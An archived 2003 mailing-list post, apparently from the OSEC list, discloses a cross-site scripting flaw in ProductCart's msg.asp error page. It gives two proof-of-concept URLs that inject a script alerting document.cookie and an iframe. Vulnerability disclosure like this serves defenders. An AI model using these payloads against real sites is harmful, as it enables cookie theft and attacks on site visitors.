OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
ProductCart XSS Vulnerability

From: atomix atomix (at0mix87yahoo.com)
Date: Sat Jul 05 2003 - 00:29:49 CDT


#####################
# ProductCart XSS #
# Vulnerability #
# found by atomix #
#####################

i came across the fact that in an area of ProductCart you are able to
manipulate the error message, therefore allowing tags such as <script> and
<iframe> to be used:

http://www.website.com/ProductCart/pc/msg.asp?message=>&lt;script&gt;alert
(document.cookie);&lt;/script&gt;

http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
20width=400%20height=400></iframe>

-atomix | atom b0mbs